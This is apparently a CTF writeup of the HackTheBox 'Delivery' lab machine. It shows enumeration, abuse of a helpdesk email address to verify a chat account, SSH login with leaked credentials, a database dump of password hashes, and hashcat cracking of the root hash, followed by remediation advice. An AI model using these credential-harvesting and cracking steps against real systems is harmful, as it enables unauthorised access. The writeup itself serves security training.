--- title: "Writeup - Delivery (HTB)" date: 2022-03-27 slug: "writeup-delivery-htb" type: "writeup-ctf" --- This is a writeup for the [Delivery](https://app.hackthebox.com/machines/Delivery) machine from the HackTheBox site. ## Enumeration First, let's start with a scan of our target with the following command: ```bash nmap -sV 10.10.11.146 ``` Three TCP ports are discovered: ![](img/image-1.webp) - 22/tcp : SSH port (OpenSSH 7.9p1) - 80/tcp : HTTP web server (nginx 1.14.2) - 8065/tcp : ???? ![](img/image-2.webp) ## Exploit After checking the site, I quickly found the `helpdesk` section. It is a site that allows the sending of tickets to support. ![](img/image-3.webp) I first try to create an account, but it's impossible, I need the validation of an admin to confirm the account. Then I try to create a ticket: ![](img/image-4.webp) I then go to view it using my email and my ticket number, I arrive on the following page: ![](img/image-5.webp) In parallel I go to visit the third open port and I find the following page: ![](img/image-6.webp) I try to create an account, but the site asks me to validate the account via email. I first try to use a temporary email, but I get no confirmation. Then I notice that when I create a helpdesk ticket, it is indicated that I can send emails to the address `3998604@delivery.htb` to add additional information to the ticket. So I use this address when creating the account and when validating I go back to the ticket site and find the following message: ![](img/image-7.webp) I can now validate my account and log in. I get the following page: ![](img/image-8.webp) After a little exploration I came across this discussion: ![](img/image-9.webp) There is a login/password let's try to use it to connect in SSH: ![](img/image-10.webp) Ok I now have a shell in `maildeliverer` time and I can get the first flag. ## Privilege escalation I know that the chat application is `mattermost` and that the configuration files for this application are in the `/opt/mattermost`folder. So I start to inspect these files. I find the config file where there are credentials for the access to the database: ```bash "SqlSettings": { "DriverName": "mysql", "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTi$ "DataSourceReplicas": [], "DataSourceSearchReplicas": [], "MaxIdleConns": 20, "ConnMaxLifetimeMilliseconds": 3600000, "MaxOpenConns": 300, "Trace": false, "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez", "QueryTimeout": 30, "DisableDatabaseSearch": false }, ``` I connect with the following command: ```bash mysql -u mmuser -p Crack_The_MM_Admin_PW -D mattermost ``` I first list the tables: ```bash MariaDB [mattermost]> show TABLES; +------------------------+ | Tables_in_mattermost | +------------------------+ | Audits | | Bots | | ChannelMemberHistory | [...] | Threads | | Tokens | | UploadSessions | | UserAccessTokens | | UserGroups | | UserTermsOfService | | Users | +------------------------+ ``` Then I display the data of the Users `Users` : ```bash MariaDB [mattermost]> SELECT * FROM Users; +----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+ | Id | CreateAt | UpdateAt | DeleteAt | Username | Password | AuthData | AuthService | Email | EmailVerified | Nickname | FirstName | LastName | Position | Roles | AllowMarketing | Props | NotifyProps | LastPasswordUpdate | LastPictureUpdate | FailedAttempts | Locale | Timezone | MfaActive | MfaSecret | +----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+ | 64nq8nue7pyhpgwm99a949mwya | 1608992663714 | 1608992663731 | 0 | surveybot | | NULL | | surveybot@localhost | 0 | | Surveybot | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1608992663714 | 1608992663731 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | | 6akd5cxuhfgrbny81nj55au4za | 1609844799823 | 1609844799823 | 0 | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | NULL | | 4120849@delivery.htb | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844799823 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | | 6wkx1ggn63r7f8q1hpzp7t4iiy | 1609844806814 | 1609844806814 | 0 | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | NULL | | 7466068@delivery.htb | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844806814 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | | 7z9izpo1wfrnddytkm8815wg4w | 1647894531289 | 1647894703010 | 0 | azerty | $2a$10$Dwc/LdQGFD0PdJrmLwD07uTbZE1CfpswRJCMsoGKeJHKtn4/LIPW. | NULL | | 3998604@delivery.htb | 1 | | | | | system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1647894531289 | 0 | 0 | en | {"automaticTimezone":"America/New_York","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | | dijg7mcf4tf3xrgxi5ntqdefma | 1608992692294 | 1609157893370 | 0 | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL | | root@delivery.htb | 1 | | | | | system_admin system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609157893370 | 0 | 0 | en | {"automaticTimezone":"Africa/Abidjan","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | | hatotzdacb8mbe95hm4ei8i7ny | 1609844805777 | 1609844805777 | 0 | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | NULL | | 9122359@delivery.htb | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844805777 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | | jing8rk6mjdbudcidw6wz94rdy | 1608992663664 | 1608992663664 | 0 | channelexport | | NULL | | channelexport@localhost | 0 | | Channel Export Bot | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1608992663664 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | | n9magehhzincig4mm97xyft9sc | 1609844789048 | 1609844800818 | 0 | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | NULL | | 5056505@delivery.htb | 1 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844789048 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+ 8 rows in set (0.000 sec) ``` In this table I find the hash of the user, I recover it and launch `hashcat` to crack it: ```bash hashcat.exe -m 3200 hash.txt pass.txt -r rules/best64.rule hashcat (v6.2.5) starting [...] Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 77 Optimizers applied: * Zero-Byte * Single-Hash * Single-Salt [...] Dictionary cache hit: * Filename..: pass.txt * Passwords.: 1 * Bytes.....: 17 * Keyspace..: 77 $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21 [...] ``` 💡To save time I switched to Windows to take advantage of the power of my GPU. Depending on your configuration, it can take more or less time.I find the `PleaseSubscribe!21` password so I can now change the user to root and get the last flag. ![](img/image-11.webp) ## Recommendations To patch this host I think it would be necessary to perform a number of actions: - Disable account creation on Matermost - Do not send a clear password in conversations - Do not use the root password on other services/for other users - Use complex passwords